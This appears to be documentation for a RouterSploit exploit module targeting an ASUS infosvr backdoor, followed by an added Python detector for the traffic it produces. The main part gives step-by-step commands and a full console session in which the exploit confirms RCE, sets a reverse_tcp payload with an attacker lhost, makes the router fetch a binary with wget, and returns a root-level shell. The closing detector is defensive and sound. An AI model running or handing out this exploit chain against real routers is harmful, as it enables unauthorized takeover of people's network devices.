## Description

Module exploits remote command execution in multiple ASUS devices. If the target is vulnerable, a command loop is invoked that allows executing commands at the operating-system level.
## Verification Steps

- Start `./rsf.py`
- Do: `use exploits/routers/asus/infosvr_backdoor_rce`
- Do: `set target [TargetIP]`
- Do: `run`
- If the router is vulnerable, it should be possible to execute commands at the operating-system level.
- Do: `set payload reverse_tcp`
- Do: `set lhost [AttackerIP]`
- Do: `run`
- The payload is sent to the device and executed, providing the attacker with a command shell.
## Scenarios

```
rsf > use exploits/routers/asus/infosvr_backdoor_rce
rsf (Asus Infosvr Backdoor RCE) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Asus Infosvr Backdoor RCE) > run
[*] Running module...
[+] Target is vulnerable
[*] Invoking command loop...
[*] Please note that only first 256 characters of the output will be displayed or use reverse_tcp
[+] Welcome to cmd. Commands are sent to the target via the execute method.
[*] For further exploitation use 'show payloads' and 'set payload <payload>' commands.
cmd > show payloads
[*] Available payloads:

   Payload       Name                Description
   -------       ----                -----------
   bind_tcp      ARMLE Bind TCP      Creates interactive tcp bind shell for ARMLE architecture.
   reverse_tcp   ARMLE Reverse TCP   Creates interactive tcp reverse shell for ARMLE architecture.

cmd > set payload reverse_tcp
cmd (ARMLE Reverse TCP) > show options

Payload Options:

   Name      Current settings   Description
   ----      ----------------   -----------
   lhost                        Connect-back IP address
   lport     5555               Connect-back TCP Port
   encoder                      Encoder

cmd (ARMLE Reverse TCP) > set lhost 192.168.1.115
lhost => 192.168.1.115
cmd (ARMLE Reverse TCP) > run
[*] Using wget method
[*] Using wget to download binary
[*] Executing payload on the device
[*] Waiting for reverse shell...
[*] Connection from 192.168.1.1:35220
[+] Enjoy your shell
ls -la
ls -la
drwxr-xr-x   18 admin root   325 Mar 15  2017 .
drwxr-xr-x   18 admin root   325 Mar 15  2017 ..
drwxr-xr-x    2 admin root     3 Mar 15  2017 asus_jffs
drwxr-xr-x    2 admin root   706 Mar 15  2017 bin
drwxr-xr-x    2 admin root     3 Mar 15  2017 cifs1
drwxr-xr-x    2 admin root     3 Mar 15  2017 cifs2
drwxr-xr-x    5 admin root  1540 Sep  4 23:04 dev
lrwxrwxrwx    1 admin root     7 Mar 15  2017 etc -> tmp/etc
lrwxrwxrwx    1 admin root     8 Mar 15  2017 home -> tmp/home
drwxr-xr-x    5 admin root     0 Sep  4 23:25 jffs
drwxr-xr-x    3 admin root   402 Mar 15  2017 lib
lrwxrwxrwx    1 admin root     9 Mar 15  2017 media -> tmp/media
drwxr-xr-x    2 admin root     3 Mar 15  2017 mmc
lrwxrwxrwx    1 admin root     7 Mar 15  2017 mnt -> tmp/mnt
lrwxrwxrwx    1 admin root     7 Mar 15  2017 opt -> tmp/opt
dr-xr-xr-x  101 admin root     0 Jan  1  1970 proc
drwxr-xr-x    7 admin root   766 Mar 15  2017 rom
lrwxrwxrwx    1 admin root    13 Mar 15  2017 root -> tmp/home/root
drwxr-xr-x    2 admin root  2428 Mar 15  2017 sbin
drwxr-xr-x   11 admin root     0 Jan  1  1970 sys
drwxr-xr-x    2 admin root     3 Mar 15  2017 sysroot
drwxrwxrwx   13 admin root   860 Sep  4 23:33 tmp
drwxr-xr-x    8 admin root   139 Mar 15  2017 usr
lrwxrwxrwx    1 admin root     7 Mar 15  2017 var -> tmp/var
drwxr-xr-x   14 admin root  6036 Mar 15  2017 www
```
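Added example, not part of the RouterSploit module or this page: a small Python detector for the on-the-wire artifact the scenario above leaves behind. Both steps of the payload stage make the router itself act as a TCP client towards a LAN host (the wget fetch of the binary, then the reverse_tcp connect-back from 192.168.1.1:35220 to lhost on lport, 5555 by default), which is something a router does not normally do. The log format, the flow records and the 8080 staging port are constructed assumptions; the page only says "wget" and does not show the serving port.

```python
import ipaddress
import re
from dataclasses import dataclass

# Constructed sample of a firewall/flow log (not output from the page). Assumed format:
#   <timestamp> <proto> <src>:<sport> -> <dst>:<dport> <tcp-flag>
# 192.168.1.1 is the router and 192.168.1.115 the attacker's host from the scenario;
# port 8080 as the payload-staging port is an assumption.
CONSTRUCTED_LOG = """\
2017-09-04T23:25:01 TCP 192.168.1.20:51234 -> 192.168.1.1:80 SYN
2017-09-04T23:33:05 TCP 192.168.1.1:41022 -> 192.168.1.115:8080 SYN
2017-09-04T23:33:10 TCP 192.168.1.1:35220 -> 192.168.1.115:5555 SYN
2017-09-04T23:33:12 TCP 192.168.1.20:51240 -> 93.184.216.34:443 SYN
2017-09-04T23:33:20 TCP 192.168.1.115:5555 -> 192.168.1.1:35220 ACK
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<proto>TCP|UDP)\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+"
    r"(?P<dst>[\d.]+):(?P<dport>\d+)\s+(?P<flags>\S+)$"
)

# Default lport of the reverse_tcp payload shown in the scenario.
DEFAULT_REVERSE_TCP_PORT = 5555


@dataclass
class Finding:
    ts: str
    src: str
    sport: int
    dst: str
    dport: int
    reason: str


def parse_line(line):
    """Parse one flow record into a dict; return None for lines that do not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["sport"] = int(rec["sport"])
    rec["dport"] = int(rec["dport"])
    return rec


def flag_router_callbacks(log_text, router_ips):
    """Return TCP connections that a router address itself initiated (SYN) towards a private LAN host.

    A router terminates or forwards LAN traffic; it opening client connections into the LAN is
    what both the wget staging and the reverse shell from the scenario look like on the wire.
    """
    routers = {ipaddress.ip_address(r) for r in router_ips}
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["proto"] != "TCP" or rec["flags"] != "SYN":
            continue  # only TCP connection attempts, not replies or UDP
        src = ipaddress.ip_address(rec["src"])
        dst = ipaddress.ip_address(rec["dst"])
        if src not in routers or not dst.is_private:
            continue
        reason = "router initiated TCP connection to LAN host"
        if rec["dport"] == DEFAULT_REVERSE_TCP_PORT:
            reason += " on default reverse_tcp port"
        findings.append(Finding(rec["ts"], rec["src"], rec["sport"],
                                rec["dst"], rec["dport"], reason))
    return findings


if __name__ == "__main__":
    for f in flag_router_callbacks(CONSTRUCTED_LOG, ["192.168.1.1"]):
        print(f"{f.ts} {f.src}:{f.sport} -> {f.dst}:{f.dport}  {f.reason}")
```

Run against the constructed log this reports the two router-originated SYNs (staging fetch and connect-back) and ignores the LAN client's normal traffic and the reply packet. The port-5555 tag is only a hint, since lport is an option the operator can change; the durable signal is the direction of the connection, so an environment where the router legitimately opens LAN connections (for example to a syslog collector or a NAS) needs an allow list for those destinations rather than dropping the rule.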